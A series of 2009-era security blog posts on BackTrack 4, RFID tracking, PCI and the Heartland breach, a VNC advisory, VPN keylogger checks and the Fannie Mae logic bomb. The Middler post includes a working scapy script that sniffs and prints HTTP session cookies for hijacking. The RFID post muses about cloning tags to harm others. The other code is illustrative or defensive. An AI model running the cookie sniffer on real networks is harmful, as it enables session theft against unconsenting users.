Quick note that BackTrack 4 beta is publicly available now.
I-Hacked has a series of nice links on installing BackTrack 4 that I didn’t feel up to snagging and reposting here.
In case someone has strangely missed this story, Chris Paget has made some headlines for a recent video where he reads and clones RFID tags around the San Francisco area. Read the comments for some good discussion (amidst the ignorant noise).
This is a very big issue for three reasons. First, obviously we need to care what may or may not be disclosed from the tags. Is it personal? Is it just a number that is looked up? This is probably the easiest issue to resolve.
Second, even if the item is just a number that is looked up, all it takes is some relatively simple database tracking or data points to start stumbling over the lines of privacy. #3482749 is Michael Dickey. #3482749 is shopping at Wal-Mart at 7:30pm. #3482749 stopped for a shake at McDonald’s at 8:15pm. And so on… And it wouldn’t take much to track this. If all the legit scanners that get issued are dumb but ping back to the master database system, the database just needs to log the location of the scanner that pinged in.
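To make that second point concrete, here’s a minimal sketch of how little glue it takes to turn dumb scanner pings into a movement history. The schema, locations, and the mapping of #3482749 to a name are all hypothetical, purely for illustration:

```python
import sqlite3

# Hypothetical master database: every dumb scanner just phones home
# with the tag number, its own known location, and a timestamp.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE pings (tag_id TEXT, location TEXT, seen_at TEXT)")

pings = [
    ("3482749", "Wal-Mart #1138", "2009-02-12 19:30"),
    ("3482749", "McDonald's #42", "2009-02-12 20:15"),
    ("3482749", "Gas station #7", "2009-02-12 20:40"),
]
db.executemany("INSERT INTO pings VALUES (?, ?, ?)", pings)

# One trivial query turns scattered pings into a movement history,
# once a single lookup table maps 3482749 to a person.
for location, seen_at in db.execute(
        "SELECT location, seen_at FROM pings "
        "WHERE tag_id = ? ORDER BY seen_at", ("3482749",)):
    print(f"#3482749 seen at {location} at {seen_at}")
```

The scary part is that no individual scanner needs to be smart; all the correlation happens back at the master database.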
Third, just how easy is it to clone a tag and fool scanners? Kinda like me opening up a Facebook page for someone else, I might be able to do quite a bit of damage to someone’s profile or reputation by wandering around with a cloned ID just for the heck of it. Or maybe I’ll just clone my own and give it away on the streets and generate so much noise… In fact, how defensible would that tag information even be, legally, if I can generate doubt like that? Can I overpower my own RFID tag by transmitting a stronger signal and drown out my card?
Besides, let’s face it, as a shop owner I might want to buy some cheap RFID reader and put it near the front door just to keep my own tabs on who my repeat visitors are based on their number. And it’s just a hop-step away from keeping a personal record of them so they can pay quicker by keeping their credit card on file and just charging them based on the number on the RFID. Come on, there’s a whole industry of people salivating at the possibilities of such tracking and ID…
And if “don’t be evil” Google will happily cross the line of privacy in pursuit of profits, so too will others. It will just take some curious entity that is large enough to connect data points, and suddenly that slippery slope is rushing by fast enough to burn our ass.
In short, it’s not just about the data given off by an RFID tag, but also how that data can be correlated. And how much the general public is made aware of the risks of unshielded tags or unquestioned tracking.
I’m a bit surprised to see talk of BackTrack 4, since it seems like BackTrack 3 is barely a year old. Alas, a new version can only be a good thing! Shmoocon attendees got to check out a pre-release version, and I wouldn’t be surprised if they did an IRC channel pre-release outing as well. Hopefully sometime soon BT4 will be widely released to the public or available to me via some other channels.
I had a few small quibbles about BT3 over BT2. I was unimpressed with the tossing away of the stealthy boot up. BT2 was very quiet on the wire, while my experiences with BT3 involved it starting up and immediately wanting an IP from the first network it saw. The BT3 hard disk installer was still pretty unintuitive, although the forums are invaluable for figuring it out.
BT4 goes back to the stealthy startup (omg newbies, you gotta start the network yourself!), and from what I gather will be much friendlier for a more permanent distro-like install (I’m assuming, here). I enjoy the livecd a lot, and someday I’m sure I’ll enjoy a USB install more, but some of us really don’t mind at all loading it on some older laptop for permanent use and tinkering. A VMware image as well? That might be worthy of a little jizz in my pants!
Anton Chuvakin posted over a week ago about some possible reasons why Heartland Payment Systems had their data breached. After his 5 examples, he concludes that none of them specifically show that PCI failed or is irrelevant. In a way, he is correct, but what we’re doing here is playing with semantics vs perception. (Something we who throw around the term “hacker” often should be very intimate with.)
If PCI didn’t fail in any of those cases, one could argue that PCI will never fail us. That means PCI compliance doesn’t offer much beyond any other list of Best Practices. Best Practices that are required. We’ve known for some time that PCI is just a general guideline. But there is either a perception problem among those adopting PCI, or a presentation problem by the PCI Gods who are requiring it.
If PCI can’t be blamed for anything, then what value is there? If PCI doesn’t allow a CTO to shift blame onto it (or a QSA) when things go wrong, there are plenty who then see no value in it. In which case it is just a requirement to meet in the least painful/costly fashion possible (which does not preclude simply lying about it). And then there truly is no value in it for those persons.
I don’t agree with that position, but it exists whether I like it or not.
Maybe the underlying concept we need to continue to hammer out is: Security is not easy.* Security is hard work. Security is not always cheap. Security costs money. I’m sure there is a haiku in there somewhere…
* Just think of all those painful experiences trying to align secure practices to people and a business. Years of those experiences, trying to guide the moving waters of a river to where you want them to flow. There are small and large security battles lost every day, and poor individual decisions and accepted gambles made constantly. We’re certainly not in it because the job is easy!
Thank you to Tyler (SSLFail.com) for posting that Jay Beale has (finally!) released The Middler (sorry, no front page discussing it, just a direct link). Released, but it looks like, upon a very quick glance, that it might not be nearly finished yet. The Middler was discussed at Defcon 16. It is a tool that can inject into http traffic between client and server, intercept and reuse session credentials, and more. In short, this is a tool that automates what many of us have known can happen when you’re on a non-trusted LAN. Only scarier. And more accessible.
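To be clear on the underlying risk (this is not The Middler’s code, just a back-of-napkin sketch of the session-credential piece it automates), a few lines of Python with scapy will passively lift plaintext HTTP session cookies off a shared LAN:

```python
# Hypothetical sketch of the risk being automated: passively lifting
# session cookies from plaintext HTTP on an untrusted LAN.
# Requires scapy and root privileges; not The Middler's actual code.
from scapy.all import sniff, Raw

def grab_cookies(pkt):
    if not pkt.haslayer(Raw):
        return  # no application payload in this packet
    payload = pkt[Raw].load
    if b"Cookie:" in payload:
        for line in payload.split(b"\r\n"):
            if line.startswith(b"Cookie:"):
                # Replaying a captured cookie is often all it takes
                # to hijack the victim's session.
                print(pkt.sprintf("%IP.src% -> %IP.dst%"),
                      line.decode(errors="replace"))

# Watch all plaintext web traffic the interface can see.
sniff(filter="tcp port 80", prn=grab_cookies, store=0)
```

The Middler goes well beyond this (injection, automation, and more), but even this little passive version should make you think twice about coffee-shop wifi.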
By the way, props to Jay for apparently skipping ahead to the demos. There is a ton of information in his presentation and all of it relevant, but I was a bit disappointed in not seeing many demos at the Defcon talk. Despite that, his was one of the best talks I saw there!
Grats to Mubix on his OSCP! In his post he talks about how the OSCP won’t get anyone a job, and I think he’s 99% correct. However, the caveat is that to anyone who knows what the OSCP is, it does have meaning. So the other 1% might be a manager who knows the OSCP and knows that anyone who has it probably has a certain level of geekery and interest in security beyond what even the CISSP will demonstrate (e.g. those sales people who are required to get the CISSP and finally do so on their 6th try…). This is part of the reason I want to get back to the OSCP after my ill-fated attempt last year (right when I got slammed with a coworker quitting). The other part being that it actually is freakin hands-on!
If you use a VNC product, more specifically UltraVNC or TightVNC (or others), you probably want to keep your eyes open for an upcoming new version of the client. Core released a VNC security advisory, and from the sound of it, a workable exploit is likely (hi Metasploit!).
Offsetting that risk, the exploit is on the client and not the server. This means an attacker has to not only get a workable exploit, but get a VNC user to connect to an untrusted or subverted VNC server. If you automatically have .vnc files mapped to the VNC client, this is where it might be useful for Metasploit to have a fake VNC server module to trick admins to connecting back to an attacker.
Now, I often get back to ideas on making a network more hostile to attackers, and this can be another opportunity, especially if a workable exploit is developed or released. Get your hands on a subverted VNC server, set it up in some dark space or honeypot area of your network, and wait for someone to attempt to connect.
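A minimal sketch of that dark-corner listener, assuming nothing more than Python’s standard library: it speaks just enough of the RFB handshake to look like a real VNC server and logs whoever connects (the exploit-serving part is deliberately left out):

```python
# A minimal VNC decoy: listen on the standard RFB port, speak just
# enough of the handshake to look real, and log whoever connects.
# This only logs; it does not serve any client-side exploit.
import socket
from datetime import datetime

HOST, PORT = "0.0.0.0", 5900  # standard VNC display :0

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind((HOST, PORT))
srv.listen(5)

while True:
    client, addr = srv.accept()
    # Real RFB servers open with their protocol version string.
    client.send(b"RFB 003.008\n")
    banner = client.recv(12)  # the client echoes its own version back
    print("%s connect from %s:%d, client sent %r"
          % (datetime.now().isoformat(), addr[0], addr[1], banner))
    client.close()
```

Point an IDS alert at that log, and any connection to it is, by definition, someone poking where they shouldn’t be.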
We use a Cisco SSL VPN at work. One of the features we have turned on when a user connects is a keylogger scanner. It just scans and alerts, but takes no administrative action. This scan seems to be rebooting the client machine on a couple of our users, and we’re not yet sure why. While discussing this in a team meeting, my boss made mention that when the keylogger check runs on his system, it flags two benign files that are false positives. He clicks Ok and continues on. The question he raised is, “What value is this check giving us if users will just click through?”
I gave it some thought over lunch. The direct value may not be much. In fact, it may result in zero improvement for users (since they won’t know what to do with the keylogger alerts) and may not prevent any infected systems from entering our network (users can just click through). If we turn on administrative action by the VPN client, legitimate users will obviously be denied the ability to do work.
There are a few indirect values to keeping the keylogger check on, even if it ultimately fails.
1. The check may log what it detects and on whom, so we have some statistics and an audit trail in case something bad happens, or someone else gets in.
2. Information is given to those few users who may investigate the issues and improve their knowledge and system health. Not doing alerts perpetuates ignorance.
3. We potentially can prevent bad systems from entering our network, or prevent the capture of login information. And let’s face it, logging our VPN IP and login information is instant ownage. This possibility alone may be worth it.
Of course, there are costs which might outweigh these indirect “values” that I see.
Ultimately, my boss mentioned in the meeting that it is clear that digital security is still not ready to be consumer-grade. And people certainly aren’t ready to handle it themselves, for the most part. I tend to agree with him. I prefer my controls to be transparent to users as much as possible, but as good as possible as well. Unfortunately, we won’t achieve security this way, but I feel the best returns are available on the technical side rather than relying on people.
I was going to shut up about Heartland, until I read Anton Chuvakin’s part III post which pointed me to a post by Verisign. After reading Verisign, read the other links Anton lists; at least one readdresses what struck me about Verisign’s post:
In our investigations of PCI related breaches, we have NEVER concluded that an affected company was compliant at the time of a breach. [emphasis theirs] PCI Assessments are point-in-time and many companies struggle with keeping it going every day.
Is there a problem with PCI? If there is one, the problem lies in the QSA community…, not the standard itself…
And Anton adds this, although I’m not sure if he’s being sarcastic or not:
Think about it! It was always either due to changes after an audit or due to an “easygrader” (or even scammer) QSA.
The above lines of thinking strike me as a dangerous place to tread. Fine, maybe we get it through enough heads that PCI is not and was never meant to be a perfect roadmap to perfect security and martinis on a tropical beach.
So we shift the “perfection” to be on the QSAs? Or maybe shift the “perfection” to be on the host company? Or shift the blame to PCI only being point-in-time (duh)? These are dangerous roads whose underlying assumption is that there is a state of security.
QSAs can only be as good as the standards, visibility, power, talent, and cooperation of the host customer. The host customer can only be as good as the talent, corporate culture/leadership, and budget (yeah, I said it!) allows them. PCI can only be as good as the authors and adherence to the spirit of the rules by the customer and QSA.
To me, this isn’t an easy answer, but I’d rather not throw blame around more than necessary. I can’t blame a QSA unless they are specifically negligent, because all QSAs will make a mistake at some point, even if that mistake happens because the customer didn’t give them the necessary visibility, or because of some brand-new technology or 0day that no one has been testing for. In that situation, no QSA will ever measure up unless they are bleeding edge and do continuous testing/auditing.
If there is any place to lay blame, it has to end up on the shoulders of the corporate entities (or any entity). They ultimately are the place that holds the keys to the most variables. Indeed, the ultimate place that needs to make the fixes and demonstrate their commitment to security is the corporate entity. Even with the absence of PCI and QSAs, they still have to buck up.
We technical geeks love solving problems, and we tend to see various things in the world as problems to be solved. We even argue amongst ourselves, quite geekily, about everything from tech topics to religion to wars to rhetoric. We see everything as a problem that *must* have a solution out there. We immediately view any voiced opinion as a challenge to be overcome.
We probably all did some sort of logic puzzle books or crossword puzzle books as kids. But I wonder how different our worlds might be if not every puzzle in those books had a possible solution hidden away in the back.
This article on the continuing saga of the Heartland Payment System data breach falls under the category of, “…no shit, you make a great and obvious point! By the way, that’s egg dripping off your face, right?”
He has called for greater information sharing to prevent cyber-criminals from using the same or similar techniques in multiple attacks.
“I believe that had we known the details about previous intrusions, we might have found and prevented the problem we learned of last week,” [CEO Robert] Carr said.
Obviously I pine about this sort of thing regularly. I think Jericho put it best on the infosecnews mailing list:
Great! I’m glad to hear Mr. Carr is all about sharing information. I take it to mean that we will get the full story about what happened at Heartland first, to show that he is serious about sharing information. After all, by his reasoning, if he shares this type of information with the world, then he may help prevent another intrusion like it.
Lastly, Mr. Carr, I can point you in the direction of any number of people who know and can share details on how to be better with security, some of whom may be technical employees in your own business. Don’t spread the blame of personal and corporate ignorance across an entire industry (even if that is true, don’t dilute the issue of Heartland in particular). At some point, someone made a mistake, made a poor risk acceptance, or decided that feigned ignorance is best (a tactic we’re taught from childhood…). I don’t mind if those above possibilities are the real reason (it happens!), but I do mind when someone tries to avoid admitting as much.
And this story of a 14-year-old boy impersonating a police officer for 5+ hours falls into the category of, “…and this is why we try to take human judgement* out of security controls.”
One source said he was told the teenager “coded a couple of assignments” — meaning he used police codes to let a dispatcher know how he and his “partner” were handling particular calls. The source said he also was told the teen was allowed to drive the squad car.
He was allowed to do this because he was familiar with the protocols (how familiar does that sound to anyone knowledgeable about social engineering?) and because controls were skipped (roll call, etc). D’oh! Maybe this was a Superbad moment?
Side note: Why don’t more people do things like this? Like so many crimes, they are not terribly hard to commit. The hardest part is crossing that very distinct moral line we have between what is right and wrong. Peer pressure influences this line, as does mental stability or digital anonymity (or distance, maybe). And once you cross that line once, crossing it again becomes easier (the downward spiral of repeat offenders). We rely heavily on this line.
* Note that we try to do this, but obviously this cannot always be done and there will always be a need for human decision-making or agility. But we try to, because we know which one we can trust, when created and maintained properly.
This Wired article on a Fannie Mae logic bomb falls into the category of, “…and this is why we stress consistency in doing the simple things in security.”
On the afternoon of Oct. 24, he was told he was being fired because of a scripting error he’d made earlier in the month, but he was allowed to work through the end of the day…
Five days later, another Unix engineer at the data center discovered the malicious code hidden inside a legitimate script that ran automatically every morning at 9:00 a.m. Had it not been found, the FBI says the code would have executed a series of other scripts designed to block the company’s monitoring system, disable access to the server on which it was running, then systematically wipe out all 4,000 Fannie Mae servers, overwriting all their data with zeroes.
How many times is a termination handled like this? Probably more regularly than I’d like to know. And how many times does it take to cause a business some serious problems? Just once.
By the way, how many reasonable people would finish out their day at work after being terminated? Sure, plenty would, but man that is a horrible decision by HR/manager.
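Circling back to the simple things: one of them is noticing when a scheduled script changes out from under you. Here’s a minimal sketch of that kind of drift check; the watched paths and baseline location are hypothetical, and in practice you’d reach for something like Tripwire or AIDE:

```python
# Minimal integrity check for scheduled scripts: compare current hashes
# against a known-good baseline and complain about any drift.
# Paths and baseline file are hypothetical examples.
import hashlib
import json
import os
import sys

BASELINE = "/var/lib/script-baseline.json"       # hypothetical location
WATCHED = ["/etc/cron.daily", "/usr/local/bin"]  # hypothetical paths

def hash_file(path):
    """SHA-256 of a file, read in chunks so large files don't hurt."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot():
    """Hash every file under the watched directories."""
    hashes = {}
    for root in WATCHED:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                hashes[path] = hash_file(path)
    return hashes

current = snapshot()
if not os.path.exists(BASELINE):
    with open(BASELINE, "w") as f:
        json.dump(current, f)  # first run: record the known-good state
    sys.exit(0)

with open(BASELINE) as f:
    baseline = json.load(f)

for path, digest in sorted(current.items()):
    if baseline.get(path) != digest:
        # A changed or brand-new script in a scheduled-job directory is
        # exactly what that other Unix engineer stumbled over, five days late.
        print("CHANGED/NEW:", path)
```

Nothing fancy, and it wouldn’t stop a determined insider with root, but run daily it shrinks that five-day discovery window to one, and it’s exactly the kind of boring, consistent control that catches this class of problem.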